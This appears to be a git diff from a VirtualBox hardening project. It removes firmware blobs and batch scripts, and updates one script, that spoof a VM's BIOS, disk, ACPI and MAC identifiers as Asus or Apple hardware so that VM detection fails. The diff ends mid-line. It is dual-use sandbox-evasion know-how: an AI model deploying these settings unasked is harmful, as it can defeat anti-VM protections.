diff --git a/Binary/Tsugumi.sys b/Binary/Tsugumi.sys
deleted file mode 100644
index 54a801e..0000000
Binary files a/Binary/Tsugumi.sys and /dev/null differ
diff --git a/Binary/data/5.2.x/ACPI-DSDT.bin b/Binary/data/5.2.x/ACPI-DSDT.bin
deleted file mode 100644
index 9337f9e..0000000
Binary files a/Binary/data/5.2.x/ACPI-DSDT.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/ACPI-SSDT1.bin b/Binary/data/5.2.x/ACPI-SSDT1.bin
deleted file mode 100644
index 76f54cd..0000000
Binary files a/Binary/data/5.2.x/ACPI-SSDT1.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd
deleted file mode 100644
index f4b5808..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd
deleted file mode 100644
index 5601684..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd
deleted file mode 100644
index 6a4c1c6..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/hidevm_ahci.cmd b/Binary/data/5.2.x/hidevm_ahci.cmd
deleted file mode 100644
index 3318208..0000000
--- a/Binary/data/5.2.x/hidevm_ahci.cmd
+++ /dev/null
@@ -1,73 +0,0 @@ -rem @echo off - -rem BIOS/AHCI mode - -rem vboxman is the full path to the vboxmanage executable -rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) - -set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" -set vmscfgdir=D:\Virtual\VBOX\Settings\ - -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0" -%vboxman% setextradata 
"%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc." -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543230AAA384" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype" -%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH" -%vboxman% setextradata "%1" 
"VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2" - - -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS" -%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E12 -%vboxman% modifyvm "%1" --paravirtprovider legacy -%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp" -%vboxman% modifyvm "%1" --hwvirtex on -%vboxman% modifyvm "%1" --vtxvpid on -%vboxman% modifyvm "%1" --vtxux on -%vboxman% modifyvm "%1" --apic on -%vboxman% modifyvm "%1" --pae on -%vboxman% modifyvm "%1" --longmode on -%vboxman% modifyvm "%1" --hpet on -%vboxman% modifyvm "%1" --nestedpaging on -%vboxman% modifyvm "%1" --largepages on - -cd /d %vmscfgdir% - -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" - - -@pause diff --git a/Binary/data/5.2.x/hidevm_efiahci.cmd b/Binary/data/5.2.x/hidevm_efiahci.cmd deleted file mode 100644 index 0b6d443..0000000 --- a/Binary/data/5.2.x/hidevm_efiahci.cmd +++ /dev/null 
@@ -1,69 +0,0 @@
-rem @echo off
-
-rem EFI/AHCI mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543240A7A384"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E85
-%vboxman% modifyvm "%1" --paravirtprovider legacy
-%vboxman% modifyvm "%1" --hwvirtex on
-%vboxman% modifyvm "%1" --vtxvpid on
-%vboxman% modifyvm "%1" --vtxux on
-%vboxman% modifyvm "%1" --apic on
-%vboxman% modifyvm "%1" --pae on
-%vboxman% modifyvm "%1" --longmode on
-%vboxman% modifyvm "%1" --hpet on
-%vboxman% modifyvm "%1" --nestedpaging on
-%vboxman% modifyvm "%1" --largepages on
-
-cd /d %vmscfgdir%
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-
-@pause
diff --git a/Binary/data/5.2.x/hidevm_efiide.cmd b/Binary/data/5.2.x/hidevm_efiide.cmd
deleted file mode 100644
index 78ef4d8..0000000
--- a/Binary/data/5.2.x/hidevm_efiide.cmd
+++ /dev/null
@@ -1,68 +0,0 @@
-rem @echo off
-
-rem EFI/IDE mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc." -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00" -%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A7A484" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789" -%vboxman% setextradata "%1" 
"VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2" - -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE" -%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E85 -%vboxman% modifyvm "%1" --paravirtprovider legacy -%vboxman% modifyvm "%1" --hwvirtex on -%vboxman% modifyvm "%1" --vtxvpid on -%vboxman% modifyvm "%1" --vtxux on -%vboxman% modifyvm "%1" --apic on -%vboxman% modifyvm "%1" --pae on -%vboxman% modifyvm "%1" --longmode on -%vboxman% modifyvm "%1" --hpet on -%vboxman% modifyvm "%1" --nestedpaging on -%vboxman% modifyvm "%1" --largepages on - -cd /d %vmscfgdir% - -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" - -@pause diff --git a/Binary/data/5.2.x/hidevm_ide.cmd b/Binary/data/5.2.x/hidevm_ide.cmd deleted file mode 100644 index 1682427..0000000 --- a/Binary/data/5.2.x/hidevm_ide.cmd +++ /dev/null 
@@ -1,70 +0,0 @@ -rem @echo off - -rem BIOS/IDE mode - -rem vboxman is the full path to the vboxmanage executable -rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) - -set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" -set vmscfgdir=D:\Virtual\VBOX\Settings\ - -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0" -%vboxman% setextradata 
"%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc." -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10 -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A8A384" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype" -%vboxman% setextradata "%1" 
"VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH" -%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2" - -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS" -%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02 -%vboxman% modifyvm "%1" --paravirtprovider legacy -%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp" -%vboxman% modifyvm "%1" --hwvirtex on -%vboxman% modifyvm "%1" --vtxvpid on -%vboxman% modifyvm "%1" --vtxux on -%vboxman% modifyvm "%1" --apic on -%vboxman% modifyvm "%1" --pae on -%vboxman% modifyvm "%1" --longmode on -%vboxman% modifyvm "%1" --hpet on -%vboxman% modifyvm "%1" --nestedpaging on -%vboxman% modifyvm "%1" --largepages on - -cd /d %vmscfgdir% -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" - -@pause diff --git a/Binary/data/5.2.x/pcbios.bin b/Binary/data/5.2.x/pcbios.bin deleted file mode 100644 index c5965f1..0000000 Binary files a/Binary/data/5.2.x/pcbios.bin and /dev/null differ diff --git a/Binary/data/5.2.x/pxerom.bin b/Binary/data/5.2.x/pxerom.bin deleted file mode 100644 index 15cb3d5..0000000 Binary files a/Binary/data/5.2.x/pxerom.bin and /dev/null differ diff --git a/Binary/data/5.2.x/splash.bmp b/Binary/data/5.2.x/splash.bmp deleted file mode 100644 index d2fad1a..0000000 Binary files a/Binary/data/5.2.x/splash.bmp and /dev/null differ 
diff --git a/Binary/data/5.2.x/videorom.bin b/Binary/data/5.2.x/videorom.bin
deleted file mode 100644
index a026f34..0000000
Binary files a/Binary/data/5.2.x/videorom.bin and /dev/null differ
diff --git a/Binary/data/ACPI-DSDT.bin b/Binary/data/ACPI-DSDT.bin
index 591bbd6..954d095 100644
Binary files a/Binary/data/ACPI-DSDT.bin and b/Binary/data/ACPI-DSDT.bin differ
diff --git a/Binary/data/ACPI-SSDT1.bin b/Binary/data/ACPI-SSDT.bin
similarity index 86%
rename from Binary/data/ACPI-SSDT1.bin
rename to Binary/data/ACPI-SSDT.bin
index f7bf4ec..89d5fcf 100644
Binary files a/Binary/data/ACPI-SSDT1.bin and b/Binary/data/ACPI-SSDT.bin differ
diff --git a/Binary/data/VBoxEFI64-6.0.0.fd b/Binary/data/VBoxEFI64-6.0.0.fd
deleted file mode 100644
index e33a2cc..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.0.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.10.fd b/Binary/data/VBoxEFI64-6.0.10.fd
deleted file mode 100644
index e2fd352..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.10.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.2.fd b/Binary/data/VBoxEFI64-6.0.2.fd
deleted file mode 100644
index d693e1b..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.2.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.4.fd b/Binary/data/VBoxEFI64-6.0.4.fd
deleted file mode 100644
index 6a149e4..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.4.fd and /dev/null differ
diff --git a/Binary/data/efi_amd64_fixed_6.1.2.fd b/Binary/data/efi_amd64_fixed_6.1.2.fd
new file mode 100644
index 0000000..9409ded
Binary files /dev/null and b/Binary/data/efi_amd64_fixed_6.1.2.fd differ
diff --git a/Binary/data/hidevm_ahci.cmd b/Binary/data/hidevm_ahci.cmd
index 3318208..1159861 100644
--- a/Binary/data/hidevm_ahci.cmd
+++ b/Binary/data/hidevm_ahci.cmd
@@ -1,6 +1,7 @@ rem @echo off rem BIOS/AHCI mode +rem This script is for use with VBoxHardenedLoader v2+ rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) @@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ +%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0 + %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" @@ -64,10 +67,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\ cd /d %vmscfgdir% %vboxman% setextradata "%1" 